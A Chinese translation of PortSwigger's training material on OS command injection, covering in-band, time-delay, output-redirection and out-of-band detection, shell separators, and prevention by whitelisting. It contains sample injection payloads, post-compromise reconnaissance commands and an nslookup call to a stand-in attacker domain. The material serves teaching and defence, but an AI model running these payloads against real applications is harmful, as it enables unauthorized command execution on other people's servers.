所有内容,来自burpsuite官方靶场(portswigger)
操作系统命令注入
什么是操作系统命令注入?
OS 命令注入(也称为 shell 注入)是一种 Web 安全漏洞,允许攻击者在运行应用程序的服务器上执行任意操作系统 (OS) 命令,并且通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用操作系统命令注入漏洞来破坏托管基础架构的其他部分,利用信任关系将攻击转向组织内的其他系统。
执行任意命令
考虑一个购物应用程序,它允许用户查看特定商店中某件商品是否有货。此信息可通过以下 URL 访问:
https://insecure-website.com/stockStatus?productID=381&storeID=29
为了提供股票信息,应用程序必须查询各种遗留系统。由于历史原因,该功能是通过调用带有产品和存储 ID 作为参数的 shell 命令来实现的:
stockreport.pl 381 29
此命令输出指定项目的库存状态,并返回给用户。
由于应用程序没有针对操作系统命令注入实施防御,攻击者可以提交以下输入来执行任意命令:
& echo aiwefwlguh &
如果在productID参数中提交了这个输入,那么应用程序执行的命令是:
stockreport.pl & echo aiwefwlguh & 29
该echo命令只是使提供的字符串在输出中回显,并且是测试某些类型的操作系统命令注入的有用方法。该&字符是一个 shell 命令分隔符,因此执行的实际上是三个单独的命令一个接一个。结果,返回给用户的输出是:
Error - productID was not providedaiwefwlguh29: command not found
三行输出表明:
- 原始
stockreport.pl命令在没有预期参数的情况下执行,因此返回了一条错误消息。 echo执行 注入的命令,并在输出中回显提供的字符串。- 原始参数
29作为命令执行,导致错误。
&在注入的命令之后 放置额外的命令分隔符通常很有用,因为它将注入的命令与注入点之后的任何内容分开。这降低了以下内容阻止执行注入的命令的可能性。
LAB:OS命令注入,简单案例
有用的命令
当发现操作系统命令注入漏洞时,执行一些初始命令以获取有关您已入侵的系统的信息通常很有用。下面总结了一些在 Linux 和 Windows 平台上有用的命令:
| 命令的目的 | Linux | 视窗 |
|---|---|---|
| 当前用户名 | whoami |
whoami |
| 操作系统 | uname -a |
ver |
| 网络配置 | ifconfig |
ipconfig /all |
| 网络连接 | netstat -an |
netstat -an |
| 运行进程 | ps -ef |
tasklist |
盲操作系统命令注入漏洞
操作系统命令注入的许多实例都是盲漏洞。这意味着应用程序不会在其 HTTP 响应中返回命令的输出。仍然可以利用盲点漏洞,但需要不同的技术。
考虑一个允许用户提交有关该站点的反馈的网站。用户输入他们的电子邮件地址和反馈消息。然后,服务器端应用程序生成一封包含反馈的电子邮件给站点管理员。为此,它mail使用提交的详细信息调用程序。例如:
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
mail命令 的输出(如果有)不会在应用程序的响应中返回,因此使用echo有效负载将无效。在这种情况下,可以使用各种其他技术来检测和利用漏洞。
使用时间延迟检测盲操作系统命令注入
可以使用将触发时间延迟的注入命令,允许您根据应用程序响应所需的时间来确认命令已执行。该ping命令是执行此操作的有效方法,因为它允许您指定要发送的 ICMP 数据包的数量,以及运行该命令所需的时间:
& ping -c 10 127.0.0.1 &
此命令将导致应用程序 ping 其环回网络适配器 10 秒。
LAB:具有时间延迟的盲操作系统命令注入
观察到响应需要10秒才能返回
通过重定向输出利用盲操作系统命令注入
可以将注入命令的输出重定向到 Web 根目录中的文件中,然后您可以使用浏览器检索该文件。例如,如果应用程序从文件系统位置提供静态资源/var/www/static,那么您可以提交以下输入:
& whoami > /var/www/static/whoami.txt &
的>字符发送从所述输出whoami命令指定的文件。然后,您可以使用浏览器获取https://vulnerable-website.com/whoami.txt文件以检索文件,并查看注入命令的输出。
LAB:带有输出重定向的盲操作系统命令注入
使用带外 ( OAST ) 技术利用 OS 命令盲注入
可以使用注入的命令,使用 OAST 技术触发与您控制的系统的带外网络交互。例如:
& nslookup kgji2ohoyw.web-attacker.com &
此有效负载使用该nslookup命令对指定域进行 DNS 查找。攻击者可以监视指定的查找发生,从而检测到命令已成功注入。
LAB:带外交互的盲操作系统命令注入
LAB:带外数据泄露的盲操作系统命令注入
注入操作系统命令的方式
多种 shell 元字符可用于执行操作系统命令注入攻击。
许多字符用作命令分隔符,允许将命令链接在一起。以下命令分隔符适用于基于 Windows 和 Unix 的系统:
&&&|||
以下命令分隔符仅适用于基于 Unix 的系统:
;- 换行符(
0x0a或\n)
在基于 Unix 的系统上,您还可以使用反引号或美元字符在原始命令中执行注入命令的内联执行:
- ``` 注入命令 ```
$(注入命令)
请注意,不同的 shell 元字符具有细微的不同行为,这些行为可能会影响它们是否在某些情况下工作,以及它们是否允许带内检索命令输出或仅对盲目利用有用。
有时,您控制的输入会出现在原始命令的引号内。在这种情况下,您需要在使用合适的 shell 元字符注入新命令之前终止引用的上下文(使用"或')
如何防止操作系统命令注入攻击
迄今为止,防止操作系统命令注入漏洞的最有效方法是永远不要从应用层代码调用操作系统命令。几乎在每种情况下,都有使用更安全的平台 API 实现所需功能的替代方法。
如果认为使用用户提供的输入调用操作系统命令不可避免,则必须执行强输入验证。一些有效验证的例子包括:
- 根据允许值的白名单进行验证。
- 验证输入是否为数字。
- 验证输入仅包含字母数字字符,没有其他语法或空格。
永远不要试图通过转义 shell 元字符来清理输入。实际上,这太容易出错并且容易被熟练的攻击者绕过。
评论区